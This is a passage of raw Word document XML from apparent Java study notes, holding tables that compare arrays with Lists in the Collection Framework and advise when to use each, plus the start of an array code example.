        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="527859FC" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B937FA9" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64956609" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Depend on abstractions, not implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="125B6459" w14:textId="7094F161" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7C5C00BB">
          <v:rect id="_x0000_i1402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="003F20E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BAEDD" w14:textId="71F9AC7E" w:rsidR="00DD2727" w:rsidRPr="00CE4B95" w:rsidRDefault="00F65D6E" w:rsidP="00F65D6E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc196307611"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collection Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="41EF01CE" w14:textId="77777777" w:rsidR="00AD1B31" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD1B31" w:rsidP="00AD1B31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0924FCC5" w14:textId="10471B5F" w:rsidR="00F27543" w:rsidRPr="00CE4B95" w:rsidRDefault="00F27543">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc196307612"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between List and </w:t>
      </w:r>
      <w:r w:rsidR="002F6BC8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="6B01C424" w14:textId="1C977767" w:rsidR="00F27543" w:rsidRPr="00CE4B95" w:rsidRDefault="00F27543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCC8D3C" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="00E61DAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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7"/>
        <w:gridCol w:w="3525"/>
        <w:gridCol w:w="4552"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="6E99CAA6" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4397F6CC" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="000B7930">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3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37E3C946" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="000B7930">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rray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AD621D" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="000B7930">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List (java.util.List)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="5EF1D97A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D003386"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC560D7"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ata structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E20E4AF"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implemented by ArrayList, LinkedList, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="3954477A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F30F73B"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ze</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14899171"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xed (set at creation time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C9D4B07"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ynamic (can grow or shrink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="24CE6ABF" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7146D794"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ntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C934D0"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 arr = new int[5];</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FBE6B4"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Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="4C9B44BB" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE1F5AF"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ata Type Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009AFB51"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oth primitives and objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54A80381"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ly objects (e.g., Integer, String)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="371781C0" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BA88934"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA496D7"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ess flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443B6ED4"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re flexible (resize, insert, delete easily)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="0E226B7A" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD96836"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emory Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E7FA1B3"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tiguous memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="016B582D"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s internal structures like arrays or nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="1FED093B" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5981D27B"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64748FA3"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lightly faster (no overhead)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66B7455E"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lightly slower due to dynamic nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="3B7472FD" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6387ED5B"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dex Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A99C7D"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ast (O(1))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35E55ED9"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ast for ArrayList, slower for LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="7B1227E7" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D6C2AAC"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ful Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39AE15BA"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built-in methods (except via Arrays class)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6684432E"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ny built-in methods: add(), remove(), contains(), etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w14:paraId="5718401C" w14:textId="77777777" w:rsidTr="004321CD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0291D437"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art of Collections API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F86E8DF"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A070E7" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="00E61DA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r>
    </w:tbl>
    <w:p w14:paraId="404D117E" w14:textId="77777777" w:rsidR="00E61DAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E61DAC" w:rsidP="00E61DAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116AE282" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="00A63D48">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en to Use What?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4902C1" w14:textId="77777777" w:rsidR="00AF20BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF20BB" w:rsidP="00A63D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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78"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="0031EB78" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8040FC" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="008F42C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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F49E061" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="008F42C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refer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="3F436A6E" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16230262" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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xed-size, performance-critical code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="581F2E63" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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ray</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="120B1B9F" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1856E18B" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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eed dynamic resizing, easy insert/remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58175455" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="2A8043A1" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2F54F7" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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oring primitives (like int, char)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65DB5607" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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ray (or use List&lt;Integer&gt;, with boxing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w14:paraId="3B2F2612" w14:textId="77777777" w:rsidTr="005610B9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15AF3F59" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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Collection API features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F1DF439" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="005610B9">
            <w:pPr>
              <w:jc w:val="cente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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14CB3FFC" w14:textId="77777777" w:rsidR="00A63D48" w:rsidRPr="00CE4B95" w:rsidRDefault="00A63D48" w:rsidP="00E61DAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EA06AA" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368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780E9560" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95" w:rsidRDefault="0060368C" w:rsidP="0060368C">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Array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0B1D3" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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457656"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in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numbers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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2D6CC" w14:textId="77777777" w:rsidR="0060368C" w:rsidRPr="00CE4B95"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457656"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
